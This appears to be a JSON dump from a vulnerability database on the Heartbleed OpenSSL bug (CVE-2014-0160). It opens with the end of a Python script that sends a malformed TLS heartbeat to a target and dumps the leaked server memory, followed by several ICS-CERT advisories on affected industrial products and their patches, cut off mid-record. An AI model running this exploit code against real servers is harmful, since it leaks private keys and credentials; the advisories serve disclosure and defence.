00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(hello) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' 
\nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(hb) \nhit_hb(s) \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126065/openssltls-disclose.txt"}], "ics": [{"lastseen": "2020-12-18T03:22:41", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\nResearcher Bob Radvanovsky of Infracritical has notified NCCIC/ICS-CERT that Innominate has released a new firmware version that mitigates the OpenSSL HeartBleed vulnerability in the mGuard products.\n\n### **\\--------- Begin Update A Part 1 of 4 --------**\n\nPhoenix Contact branded devices are not likely to be affected, but Phoenix Contact has released a new firmware version to alleviate concern about this vulnerability affecting its products.\n\n### **\\--------- End Update A Part 1 of 4 ----------**\n\nThis vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\n### **\\--------- Begin Update A Part 2 of 4 --------**\n\nThe following mGuard versions are affected:\n\n * mGuard firmware Versions 8.0.0 and 8.0.1\n\nmGuard firmware versions prior to 8.0.0 whether running on Innominate, Phoenix Contact, or other brands of devices are NOT affected.\n\n### **\\--------- End Update A Part 2 of 4 ----------**\n\n## IMPACT\n\nmGuard firmware Versions 8.0.0 and 8.0.1 use the OpenSSL cryptographic library and transport layer security (TLS) implementation Version 1.0.1, which is known to be vulnerable to the HeartBleed vulnerability.\n\nImpact to individual organizations depends on many factors that are unique to each organization. 
ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND \n\n### **\\--------- Begin Update A Part 3 of 4 --------**\n\nInnominate is a German-based company that sells products worldwide through its international partners. Innominate was acquired by Phoenix Contact in 2008.\n\n### **\\--------- End Update A Part 3 of 4 ----------**\n\nThe affected products, the mGuard family of products, are industrial security routers. They can be found in many critical infrastructure sectors, including Communications, Healthcare and Public Health, and Critical Manufacturing.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERa\n\nBecause of the unpredictable memory layout of HTTPS communication, it is possible that the private key of the mGuard web graphic user interface could be disclosed. An attacker could use this key to impersonate the authenticated user and perform a man-in-the-middle attack.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nAll users of the affected mGuard firmware Versions 8.0.0 and 8.0.1 should upgrade to mGuard firmware Version 8.0.2. Innominate recommends users update SSL keys on the affected products after upgrade. 
The mGuard firmware Version 8.0.2 provides a combined function to replace both the HTTPS and SSH keys.\n\nFor more information regarding this vulnerability and specific instructions on how to install the latest firmware version, please see the Innominate Security Advisory published April 11, 2014, at the following location:\n\n<http://www.innominate.com/data/downloads/software/innominate_security_advisory_20140411_001_en.pdf>\n\n### **\\--------- Begin Update A Part 4 of 4 --------**\n\nPhoenix Contact branded devices are not vulnerable to this issue, as they are using mGuard firmware Version 7.5 that is not affected by HeartBleed. Only mGuard firmware Versions 8.0.0 and 8.0.1 are affected. Phoenix Contact has posted the 8.0.2 firmware patch release on its web site:\n\n<https://www.phoenixcontact.com/mguardsecurity>\n\n### **\\--------- End Update A Part 4 of 4 ----------**\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. 
ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed April 15, 2014.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed April 15, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed April 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. 
You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-105-02A>); we'd welcome your feedback.\n", "edition": 16, "modified": "2018-09-06T00:00:00", "published": "2014-04-17T00:00:00", "id": "ICSA-14-105-02A", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-105-02A", "title": "Innominate mGuard OpenSSL HeartBleed Vulnerability (Update A)", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-18T03:21:42", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\nSchneider Electric Wonderware\u2019s Cyber Security Team has identified an OpenSSL Heartbleed vulnerability in the Wonderware Intelligence application, caused by a third-party component. Schneider Electric Wonderware has produced a patch that mitigates this vulnerability.\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe latest release of Schneider Electric Wonderware Intelligence Version 1.5 SP1 is not susceptible to the OpenSSL vulnerability. However, users have been known to reinstall Tableau Server, the vulnerable third-party component that is affected. Therefore, Schneider Electric Wonderware has issued a patch and a security bulletin addressing this vulnerability in all versions.\n\nTableaua has been identified as the third-party component vendor that has product vulnerable to the OpenSSL Heartbleed bug. 
The following Tableau products susceptible to the OpenSSL vulnerability used in the Schneider Electric Wonderware Intelligence product are:\n\n * Tableau Server ver 8.0.6 through 8.0.9\n * \u200bTableau Server ver 8.1.0 through 8.1.5.\n\n## IMPACT\n\nA missing bounds check in the handling of the TLS Heartbeat extension can be used to reveal up to 64kB of memory on a connected device. An attacker who successfully exploits this vulnerability may obtain the user credentials and cryptographic keys used to access the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSchneider Electric corporate headquarters is located in Paris, France, and maintains offices in more than 100 countries worldwide.\n\nSchneider Electric Wonderware Intelligence is a real-time operations management software distributed by Schneider Electric. Schneider Electric provides automation and information technologies and systems.\n\nAccording to Schneider Electric, Wonderware Intelligence is deployed across several sectors including Critical Manufacturing, Energy, Healthcare and Public Health, and Water and Wastewater Systems. Schneider Electric states that these products are used worldwide.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERb\n\nThe Heartbleed bug could allow attackers to read unallocated memory of OpenSSL running processes. This could reveal data like transmitted data, passwords, or private keys. The attacker must have network access to the affected devices to exploit this vulnerability.\n\nCVE-2014-0160c has been assigned to this vulnerability. 
A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).d\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nSchneider Electric Wonderware has issued Security Advisory \u201cTableau OpenSSL Vulnerability (LFSEC00000098),\u201d available at (user registration required to access this site):\n\n<https://wdn.wonderware.com/sites/WDN/Pages/Security%20Central/CyberSecurityUpdates.aspx>\n\nTableau has released several firmware update fixes for the OpenSSL vulnerability. Schneider Electric Wonderware has incorporated and successfully tested Wonderware Intelligence Security patch LFSec00000098 (registration required). Tableau has released the following maintenance Versions 8.1.6 and 8.0.10 on its primary and alternate download sites.\n\nThe Tableau primary customer download site (User registration required to access this site) is located here:\n\n<https://auth.tableausoftware.com/user/login?>\n\nThe Tableau alternate download site, where Version 8.1.6 for Desktop and Server (4/10/2014) is available, is located here:\n\n<https://licensing.tableausoftware.com/esdalt/>\n\nSchneider Electric Wonderware recommends customers who have enabled SSL using Tableau Server Versions 8.0.6 through 8.0.9 or 8.1.0 through 8.1.5 should apply the security update to all nodes where the Tableau Dashboard Server is installed. The process consists of uninstalling the Dashboard Server and installing the new version. 
The server configuration and published dashboards will be preserved during the installation of the new version.\n\nAny certificates used to configure the SSL communications should be revoked, and new certificates should be acquired and used after patching the vulnerability.\n\nAny passwords used for accessing the server should also be changed after applying the update.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. 
Tableau Software release notes http://www.tableausoftware.com/support/releases, last accessed May 15, 2014.\n * b. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed May 15, 2014.\n * c. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed May 15, 2014.\n * d. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed May 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-135-02>); we'd welcome your feedback.\n", "edition": 16, "modified": "2018-08-27T00:00:00", "published": "2014-05-15T00:00:00", "id": "ICSA-14-135-02", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-135-02", "title": "Schneider Electric Wonderware Intelligence Security Patch for OpenSSL Vulnerability", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-18T03:22:24", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\nResearcher Bob Radvanovsky of Infracritical has notified NCCIC/ICS-CERT that Certec has released new libraries that mitigate the 
OpenSSL Heartbleed vulnerability in atvise scada.\n\nThis vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nCertec reports that the vulnerability affects the following versions of atvise scada:\n\n * atvise scada Versions 2.3 and above.\n\n## IMPACT\n\nAn attacker exploiting the OpenSSL Heartbleed vulnerability may be able to obtain private keys of the target system. The attacker could then use this key to impersonate the authenticated user and perform a man-in-the-middle attack.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nCertec EDV GmbH is based in Austria.\n\nThe affected product, atvise, is web-based human-machine interface supervisory control and data acquisition (HMI SCADA) systems. According to Certec, atvise is deployed in every field of industrial automation. Certec states that these products are used worldwide.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERa\n\nThe atvise scada uses the OpenSSL cryptographic library and transport layer security (TLS) implementation Version 1.0.1, which is known to be vulnerable to the Heartbleed vulnerability.\n\nCVE-2014-0160b has been assigned to this vulnerability. 
A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nCertec has made the new OpenSSL (1.0.1g) libraries available to fix the Heartbleed bug in atvise. The DLLs and the installation instructions can be found on their web site at the following location:\n\n<http://www.atvise.com/en/component/phocadownload/category/2-products?download=181:patch-openssl>\n\nFor more information, please see Certec\u2019s security update at the following location:\n\n<http://www.atvise.com/en/news-events/news/260-important-security-update-heartbleed-bug>\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. 
ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed April 24, 2014.\n * b. NVD, https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed April 24, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/AU:N/C:P/I:N/A:N, web site last accessed April 24, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. 
You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-114-01>); we'd welcome your feedback.\n", "edition": 17, "modified": "2018-08-23T00:00:00", "published": "2014-04-24T00:00:00", "id": "ICSA-14-114-01", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-114-01", "title": "Certec atvise scada OpenSSL Heartbleed Vulnerability", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-18T03:21:55", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\nThis updated advisory is a follow-up to the updated advisory titled ICSA-14-105-03A Siemens Industrial Products OpenSSL Heartbleed Vulnerability that was published April 29, 2014, on the NCCIC/ICS-CERT web site.\n\nSiemens reported to ICS-CERT a list of products affected by the OpenSSL vulnerability (known as \u201cHeartbleed\u201d). Joel Langill of Infrastructure Defense Security Services reported to ICS-CERT and Siemens the OpenSSL vulnerability affecting the S7-1500.\n\n### **\\--------- Begin Update B Part 1 of 3 --------**\n\nSiemens has produced an update and Security Advisory (SSA-635659) that mitigates this vulnerability in each of the affected products listed below.\n\n### **\\--------- End Update B Part 1 of 3 ----------**\n\nThis vulnerability could be exploited remotely. 
Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\n### **\\--------- Begin Update **B** Part 2 of 3 --------**\n\nThe following Siemens products are affected:\n\n * eLAN-8.2 eLAN prior to 8.3.3 (affected when RIP is used\u2014update available),\n * WinCC OA only V3.12 (always affected\u2014update available),\n * S7-1500 V1.5 (affected when HTTPS active\u2014update available),\n * CP1543-1 V1.1 (affected when FTPS active\u2014update available), and\n * APE 2.0 (affected when SSL/TLS component is used in customer implementation\u2014update available).\n\n### **\\--------- End Update B Part 2 of 3 ----------**\n\n## IMPACT\n\nA successful \u201cHeartbleed\u201d exploit of the affected products by an attacker with network access could allow attackers to read sensitive data (to include private keys and user credentials) from the process memory.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSiemens is a multinational company headquartered in Munich, Germany.\n\nThe affected Siemens industrial products are for process and network control and monitoring in critical infrastructure sectors such as Chemical, Critical Manufacturing, Energy, Food and Agriculture, and Water and Wastewater Systems.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### BUFFER ERRORSa\n\nThe Heartbleed vulnerability could allow attackers to read unallocated memory of OpenSSL running processes. This could reveal secrets like transmitted data, passwords, or private keys.\n\nCVE-2014-0160b has been assigned to this vulnerability. 
A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nThe attacker must have network access to the affected devices to exploit this vulnerability. Siemens recommends operating all products except perimeter devices only within trusted networks.\n\n### **\\--------- Begin Update B Part 3 of 3 --------**\n\nSiemens provides updates for the following products:\n\n * eLAN-8.2. To obtain the update to Version 8.3.3, submit a support request online at:\n\n<http://www.siemens.com/automation/support-request>\n\n * WinCC OA V3.12. The update for WinCC OA 3.12 can be obtained here (login required):\n\n[https://portal.etm.at/index.php?option=com_content&view=category&id=65&layout=blog&Itemid=80](<https://portal.etm.at/index.php?option=com_content&view=category&id=65&layout=blog&Itemid=80>)\n\n * CP-1543-1 V1.1. The update for CP-1543 V1.1 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/92417421>\n\n * APE 2.0. The update for APE can be obtained here:\n\n<http://www.ruggedcom.com/support/appnotes/>\n\n * S7-1500 V1.5. The update for S7-1500 V1.5 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/67295862/133100>\n\n * S7-1500 V1.5. 
The update for S7-1500 Failsafe V1.5 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/87493352/133100>\n\n### **\\--------- End Update B Part 3 of 3 ----------**\n\nSiemens provides specific advice for mitigating risk in each of the affected products in SSA\u2011635659, which can be found at their web site at the following location:\n\n<http://www.siemens.com/cert/advisories>\n\nThe researcher suggests if HTTPS is not needed to disable it until a patch is available and applied to the vulnerable product/service.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. 
ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed April 15, 2014.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed April 15, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed April 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. 
You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-105-03B>); we'd welcome your feedback.\n", "edition": 16, "modified": "2018-09-06T00:00:00", "published": "2014-05-20T00:00:00", "id": "ICSA-14-105-03B", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-105-03B", "title": "Siemens Industrial Products OpenSSL Heartbleed Vulnerability (Update B)", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-18T03:21:38", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\n### **\\--------- Begin Update A Part 1 of 2--------**\n\nThis updated advisory is a follow-up to the original advisory titled ICSA-14-126-01 ABB Relion 650 Series OpenSSL Vulnerability, that was published May 06, 2014, on the NCCIC/ICS-CERT web site.\n\nABB has identified an OpenSSL vulnerability in its Relion 650 series application and has issued maintenance Release 650 series Ver 1.3.0.1 to mitigate this vulnerability.\n\n### **\\--------- End Update A Part 1 of 2 ----------**\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe following ABB Relion versions are affected:\n\n * 650 series Ver 1.3.0\n\n## IMPACT\n\nA missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64 kB of memory on a connected device. 
An attacker who successfully exploits this vulnerability may obtain the user credentials and cryptographic keys used to access the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nABB is a Swiss-based company that maintains offices in several countries around the world. ABB develops products in multiple critical sectors that are deployed worldwide.\n\nThe affected product, 650 series Ver 1.3.0 family, provides protection, control, measurement, and supervision of power systems specifically supporting bay control, transformer protection, line distance protection, generator protection, busbar protection, and breaker protection. These products support the electrical sector SCADA systems.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER**a**\n\nThe 650 series Ver 1.3.0 devices use the vulnerable version of OpenSSL 1.0.1c. This affects parts of the FTPS protocol and the tool access protocol. Both of these protocols are known to use the OpenSSL component.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a moderate skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\n### **\\--------- Begin Update A Part 2 of 2--------**\n\nThe ABB cybersecurity team has issued a Cyber Security Advisory and software maintenance Release 650 series 